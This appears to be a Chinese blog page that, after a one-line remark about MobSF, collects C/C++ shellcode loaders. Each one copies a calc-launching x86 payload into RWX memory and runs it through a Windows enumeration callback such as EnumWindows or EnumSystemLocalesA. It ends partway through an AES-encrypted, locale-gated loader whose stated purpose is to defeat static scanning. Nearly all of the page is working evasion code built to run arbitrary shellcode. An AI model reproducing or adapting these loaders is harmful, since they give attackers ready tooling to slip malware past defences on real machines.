mobsf api调试

mobsf api调试

mobsf

平台需要接入移动端扫描,于是选用了mobsf

查阅 MobSF 的源码可知,其静态扫描是通过正则表达式匹配敏感信息实现的,因此误报较多,扫描结果需要人工复核。

c shellcode callback function

c shellcode callback function

EnumChildWindows.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


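int main()
{
    // 32-bit x86 position-independent payload. Reading the bytes: mov edi,fs:[ebx+0x30]
    // (PEB walk), compares against "Crea"/"oces", then pushes "calc" -- it appears to
    // resolve CreateProcessA and start calc.exe; confirm in a debugger. The fs:[0x30]
    // access is 32-bit only, so this loader must be built as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // Technique demo: copy the payload into a private RWX region and hand that
    // address to EnumChildWindows as its WNDENUMPROC, so the API makes the first
    // call into the buffer. NOTE(review): RWX private memory used as a callback
    // target is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // Unchecked in the original: a failed allocation made memcpy write to NULL.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumChildWindows((HWND) NULL, (WNDENUMPROC) hAlloc, NULL);

    // Release the executable region; the original never freed it.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}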

EnumDateFormatsA.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>

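int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumDateFormatsA then calls the buffer as its
    // DATEFMT_ENUMPROCA callback. NOTE(review): RWX private memory passed as a
    // callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumDateFormatsA((DATEFMT_ENUMPROCA)hAlloc, LOCALE_SYSTEM_DEFAULT, (DWORD) 0);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}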

EnumDesktopW.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include "Wingdi.h"


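int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumDesktopsW on the process window station then
    // calls the buffer as its DESKTOPENUMPROCW callback. NOTE(review): RWX private
    // memory passed as a callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    BOOL ok = EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW) hAlloc, NULL);
    if (!ok) {
        // GetLastError() is a DWORD (%lu, not %d) and is only meaningful after
        // a failed call; the original printed it unconditionally.
        printf("EnumDesktopsW failed: %lu\n", GetLastError());
    }

    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}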

EnumDesktopWindows.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>

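int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumDesktopWindows on the current thread's desktop
    // then calls the buffer as its WNDENUMPROC. NOTE(review): RWX private memory
    // passed as a callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),
        (WNDENUMPROC) hAlloc,
        (LPARAM)      NULL);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}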

EnumSystemCodePagesA.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


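int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumSystemCodePagesA then calls the buffer as its
    // CODEPAGE_ENUMPROCA callback. NOTE(review): RWX private memory passed as a
    // callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumSystemCodePagesA((CODEPAGE_ENUMPROCA)hAlloc, 0);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}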

EnumSystemCodePagesW.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <string>
using namespace std;

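// Return the text of the calling thread's last-error code as a std::string.
// Returns an empty string when GetLastError() is 0 or the message lookup fails.
// The message keeps the trailing CRLF that FormatMessage produces.
std::string GetLastErrorStdStr()
{
    DWORD error = GetLastError();
    if (error == 0)
    {
        return std::string();
    }

    LPSTR msg = NULL;
    // Call the ANSI entry point explicitly. The original used the TCHAR macro
    // FormatMessage, which in a UNICODE build fills a wchar_t buffer and returns
    // a wchar_t count -- but the result was then read as narrow chars.
    DWORD len = FormatMessageA(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_FROM_SYSTEM |
        FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,
        error,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPSTR)&msg,
        0, NULL);
    if (len == 0 || msg == NULL)
    {
        return std::string();
    }

    std::string result(msg, msg + len);
    LocalFree(msg);   // buffer came from FORMAT_MESSAGE_ALLOCATE_BUFFER
    return result;
}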


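int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumSystemCodePagesW(CP_INSTALLED) then calls the
    // buffer as its CODEPAGE_ENUMPROCW callback. NOTE(review): RWX private memory
    // passed as a callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    BOOL ok = EnumSystemCodePagesW((CODEPAGE_ENUMPROCW)hAlloc, CP_INSTALLED);
    if (!ok) {
        // Always pass a literal format string: the original used the system
        // message itself as the format (CERT FIO30-C). GetLastError() is only
        // meaningful after a failed call, so print on failure only.
        printf("%s", GetLastErrorStdStr().c_str());
    }

    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}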
    

EnumSystemGeoID.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


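int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumSystemGeoID then calls the buffer as its
    // GEO_ENUMPROC callback. NOTE(review): RWX private memory passed as a
    // callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC) hAlloc);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}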

EnumSystemLanguageGroupsA.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


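int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumSystemLanguageGroupsA then calls the buffer as
    // its LANGUAGEGROUP_ENUMPROCA callback. NOTE(review): RWX private memory
    // passed as a callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA) hAlloc, LGRPID_SUPPORTED, 0);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}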

EnumSystemLocalesA.cpp


//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


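int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumSystemLocalesA then calls the buffer as its
    // LOCALE_ENUMPROCA callback. NOTE(review): RWX private memory passed as a
    // callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumSystemLocalesA((LOCALE_ENUMPROCA)hAlloc, NULL);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}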

EnumThreadWindows.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


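int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumThreadWindows then calls the buffer as its
    // WNDENUMPROC (thread id 0 is passed through unchanged from the original).
    // NOTE(review): RWX private memory passed as a callback is a pattern memory
    // scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumThreadWindows(0, (WNDENUMPROC) hAlloc, 0);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}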

EnumUILanguagesA.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>


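int main()
{
    // 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
    // compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
    // and start calc.exe (confirm in a debugger). Build this loader as x86.
    char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

    // RWX allocation + copy; EnumUILanguagesA(MUI_LANGUAGE_ID) then calls the
    // buffer as its UILANGUAGE_ENUMPROCA callback. NOTE(review): RWX private
    // memory passed as a callback is a pattern memory scanners commonly flag.
    LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (hAlloc == NULL) {
        // The original copied into a NULL pointer when the allocation failed.
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(hAlloc, shellcode, sizeof(shellcode));

    EnumUILanguagesA((UILANGUAGE_ENUMPROCA)hAlloc, MUI_LANGUAGE_ID, 0);

    // Release the region the original leaked.
    VirtualFree(hAlloc, 0, MEM_RELEASE);
    return 0;
}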

EnumWindows.cpp

//#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
// Unused WNDENUMPROC stub kept for reference: a callback with this signature
// returns TRUE to let EnumWindows continue. main below passes the shellcode
// buffer to EnumWindows instead of this function.
static BOOL CALLBACK EnumWindowCallback(HWND hWnd, LPARAM lparam) {
	(void)hWnd;
	(void)lparam;
	return TRUE;   // keep enumerating
}
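int main()
{
	// 32-bit x86 position-independent payload: PEB walk via fs:[0x30], export-name
	// compares against "Crea"/"oces", push "calc" -- appears to resolve CreateProcessA
	// and start calc.exe (confirm in a debugger). Build this loader as x86.
	char shellcode[] = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7";

	// RWX allocation + copy; EnumWindows then calls the buffer as its WNDENUMPROC
	// (the EnumWindowCallback stub above is not used). NOTE(review): RWX private
	// memory passed as a callback is a pattern memory scanners commonly flag.
	LPVOID hAlloc = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (hAlloc == NULL) {
		// The original copied into a NULL pointer when the allocation failed.
		printf("VirtualAlloc failed: %lu\n", GetLastError());
		return 1;
	}
	memcpy(hAlloc, shellcode, sizeof(shellcode));

	EnumWindows((WNDENUMPROC)hAlloc, NULL);

	// Release the region the original leaked.
	VirtualFree(hAlloc, 0, MEM_RELEASE);
	return 0;
}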

reg shellcode加载器


#define _CRT_SECURE_NO_DEPRECATE

#include "Base64.h"
#include "AES.h"
#include <Windows.h>
#include <stdio.h>
#include <Winnls.h>

#pragma comment(lib,"Kernel32.lib")
#include <iostream>
using namespace std;
#define BUF_SIZE 4096

HKEY hKey;                          // not used anywhere in this file
HKEY rootKey = HKEY_CURRENT_USER;   // hive whose root receives the staging value "HelloTest"
DWORD cbData;                       // byte count filled in by RegQueryValueExA in main



// Unused WNDENUMPROC stub kept for reference: a callback with this signature
// returns TRUE to let EnumWindows continue. main below passes the decrypted
// payload buffer to EnumWindows instead of this function.
static BOOL CALLBACK EnumWindowCallback(HWND hWnd, LPARAM lparam) {
    (void)hWnd;
    (void)lparam;
    return TRUE;   // keep enumerating
}

// 16-byte AES key and IV, hard-coded in the binary: anyone holding the
// executable can recover the payload, so this defeats static string scanning
// only and provides no confidentiality.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//in ECB mode the chain/IV would not matter and could be left empty; DecryptionAES below decrypts with AES::CBC, so here it does

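// Base64-decode strSrc, AES-CBC decrypt it with g_key/g_iv and strip PKCS#7
// padding. Returns the plaintext up to its first NUL byte (the caller expects
// an ASCII hex string). Returns an empty string when the decoded input is not
// a whole number of 16-byte blocks, or -- after printing "decode error" --
// when the padding bytes are inconsistent.
string DecryptionAES(const string& strSrc)
{
	string cipher = base64_decode(strSrc);
	size_t length = cipher.length();
	// CBC ciphertext is a multiple of the 16-byte block size. The original
	// indexed szDataOut[length - 1] unconditionally, which is out of bounds
	// for an empty decode.
	if (length == 0 || length % 16 != 0)
	{
		return string();
	}

	// One extra byte keeps a NUL terminator for the c_str() truncation below;
	// Decrypt writes exactly `length` bytes.
	string plain(length + 1, '\0');

	AES aes;
	aes.MakeKey(g_key, g_iv, 16, 16);
	aes.Decrypt(&cipher[0], &plain[0], length, AES::CBC);

	// PKCS#7: the last byte is the pad length (1..16) and every pad byte must
	// equal it. The original wrote `0x00 < x <= 0x16`, a chained comparison
	// that is always true, and used 0x16 where 16 (0x10) was meant.
	unsigned char pad = static_cast<unsigned char>(plain[length - 1]);
	if (pad >= 1 && pad <= 16)
	{
		for (size_t i = length - pad; i < length; i++)
		{
			if (static_cast<unsigned char>(plain[i]) != pad)
			{
				cout << "decode error" << endl;
				return string();
			}
			plain[i] = '\0';
		}
	}
	// Out-of-range pad byte: return the block as-is, like the original.
	return string(plain.c_str());
}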

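int main()
{
	// Runtime gate: exit unless the system default language is 0x0804 (zh-CN).
	// Analyst note: the payload never runs on other locales, so a sandbox needs
	// a matching system language to observe it.
	LANGID test_id = GetSystemDefaultLangID();
	if (test_id != 0x0804)
	{
		exit(0);
	}

	// Base64(AES-CBC(hex text of the shellcode)). Decryptable with the keys
	// hard-coded above, so this is obfuscation against static scanning only.
	// The literal is written as two adjacent pieces; the compiler joins them.
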